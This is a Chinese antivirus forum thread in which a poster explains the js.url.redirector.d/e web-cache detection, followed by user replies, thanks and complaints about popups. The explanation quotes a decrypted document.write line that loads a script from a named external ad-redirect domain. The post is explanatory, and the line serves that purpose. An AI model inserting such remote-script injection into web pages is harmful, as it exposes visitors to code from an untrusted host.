360_土豆 发表于 2015-12-2 16:43

【科普贴】关于js.url.redirector.d / js.url.redirector.e 病毒

http://image.xcar.com.cn/attachments/a/day_170720/2017072008_93efd41cbc3305225d6awobpC5E5nCpx.gif关于js.url.redirector.d / js.url.redirector.e 病毒
一、中毒现象:360杀毒实时监控总是提示发现病毒并成功删除

此类恶意文件主要存在于如下类似路径:

二、中的是什么毒js.url.redirector.d/e病毒文件通常是:

这是一段代码,被加密了,解密后的内容,在末尾有如下代码document.write(<src='http://run.suobianyu.com/a.js'><\/>);其中的网址 http://run.suobianyu.com/a.js 是恶意推广链接

三、为什么中毒由于被访问的网站带有这些url后缀,在浏览网页(如视频 、音乐等网站)时,保存在IE临时缓存目录中的文件存在如上恶意代码,所以被360杀毒监控报出,弹窗提醒。

四、我该怎么做1、 此病毒危害不大,主要目的是推广。遇到此情况可直接选择【处理】。建议勾选【自动处理不再提示】。2、 此病毒杀掉一次后,下次浏览网页可能会再次出现,产生的打扰比较多,目前360杀毒正在考虑新的解决方案,减少打扰。

ihujianfei 发表于 2016-1-24 10:02

空白_龙 发表于 2015-12-23 01:06 static/image/common/back.gif
@360_土豆.....那么问题来了,你可以看下之前360拦截的oyasj.com现在改成了新网址
sc.kaillan.com后缀太多 ...

请参考这个处理下 http://www.hostloc.com/thread-300438-1-1.html

360fans81446730 发表于 2015-12-2 17:15

360对网页一类的病毒处理应该都是直接后台隔离,根本不用提示用户,提示用户只会让用户庸人之扰。

晨晓雨露 发表于 2015-12-5 09:18

学习了!!{:4_91:}

瞿小凯 发表于 2015-12-6 16:39

长知识了{:4_86:}

jiang19971006 发表于 2015-12-11 20:41

支持360

绿色WiFi 发表于 2015-12-12 17:02

删除(格式化方式)真得好用吗?能删掉吗?{:4_97:}质疑ING

cjzmly 发表于 2015-12-14 17:54

周晓磊001 发表于 2015-12-2 17:15 static/image/common/back.gif
360对网页一类的病毒处理应该都是直接后台隔离,根本不用提示用户,提示用户只会让用户庸人之扰。 ...

我觉得是病毒木马等危险网页的话还是应该提醒一下,至少用户知道这个网站是危险网站了之后以后会尽量避免再此浏览了,要不什么都不提示还以为是安全网页,什么生活中毒了都不知道,还随便用网银的那岂不是很危险的时

xuebaideqiang 发表于 2015-12-14 18:46

呵呵呵,学习了,病毒真实讨厌。

360fans2572011110 发表于 2015-12-23 01:06

@360_土豆.....那么问题来了,你可以看下之前360拦截的oyasj.com现在改成了新网址
sc.kaillan.com后缀太多我就不说了,这个会自动跳转到baidu.56.com,那么是什么原因在游览网页或者打开程序链接时自动弹出的呢?就是因为弹出,所以导致现在360每天不断的重复报js病毒

360fans52692611 发表于 2015-12-23 13:10

还有个js.iframe.adware.b老是给我自动给我开网页~烦死了~赶紧处理吧~

飞漾 发表于 2015-12-24 23:57

10楼碰到的问题咱也邂逅了,结果也热恋上了,360能彻底解决这个恶意广告吗?

围墙里的歌声 发表于 2015-12-26 10:32

CyrusII 发表于 2015-12-23 13:10 static/image/common/back.gif
还有个js.iframe.adware.b老是给我自动给我开网页~烦死了~赶紧处理吧~

同求处理

围墙里的歌声 发表于 2015-12-27 10:24

求解决啊

360fans823406076 发表于 2015-12-27 14:12

绿色WiFi 发表于 2015-12-12 17:02 static/image/common/back.gif
删除(格式化方式)真得好用吗?能删掉吗?质疑ING

用360文件粉碎不就行了嘛SB

360fans756971534 发表于 2016-1-6 16:46

我点的自动处理但是还是给我自动开网页,我的浏览器开着我还能手动关闭网页,但是浏览器没开的话我连浏览器都打不开,只能重启电脑,这病毒难道杀不掉吗

绿色WiFi 发表于 2016-1-6 21:45

请问_QW 发表于 2015-12-27 14:12 static/image/common/back.gif
用360文件粉碎不就行了嘛SB

金山毒霸和
360文件粉碎是一样的美国删除格式,有的病毒可以反擦除。

360fans1412699595 发表于 2016-2-20 11:19

{:4_89:}{:4_89:}{:4_89:}{:4_89:}{:4_89:}

360fans15710820 发表于 2016-5-16 19:26

编程代码太专业看不懂{:4_93:}{:4_93:}{:4_93:}{:4_93:}

心晴的味道 发表于 2016-5-19 08:32

很好的普及!

haha1350254066 发表于 2016-6-2 16:58

{:4_93:}酷狗 一大堆

玫瑰花雨 发表于 2016-6-22 07:50

土豆辛苦了

es_king 发表于 2016-6-24 01:27

{:2_26:}

哈是哈 发表于 2016-6-30 11:37

谢谢分享

瞿小凯 发表于 2016-7-5 13:53

支持一下{:2_25:}

痛定思痛_2014 发表于 2016-7-12 12:07

我也遇到过:手机老是提示有软件尝试安装是否允许?来源为未知应用!用360扫描没发现问题。严重干扰手机实用。后来没办法只能刷机了。

360cyuser70463147 发表于 2016-7-17 14:34

哦哦哦哦哦

360fans_DcHBtm 发表于 2016-7-19 09:10

就因为这个,我电脑来了一次全盘扫描,我下了4G多的软件游戏都废了{:14_363:}{:4_108:}

360fans71529043 发表于 2016-7-19 21:16

360不管是卫士还是杀毒,界面实在太大了,对我们迷你版本的笔记本,打开卫士或者杀毒,感觉界面好大,能否缩小,或者自定义模式,其实只要该显示的功能键显示出来,就可以了,不需要那么大的界面

360fans2729601776 发表于 2016-7-27 12:31

360非常好
页: [1] 2 3
查看完整版本: 【科普贴】关于js.url.redirector.d / js.url.redirector.e 病毒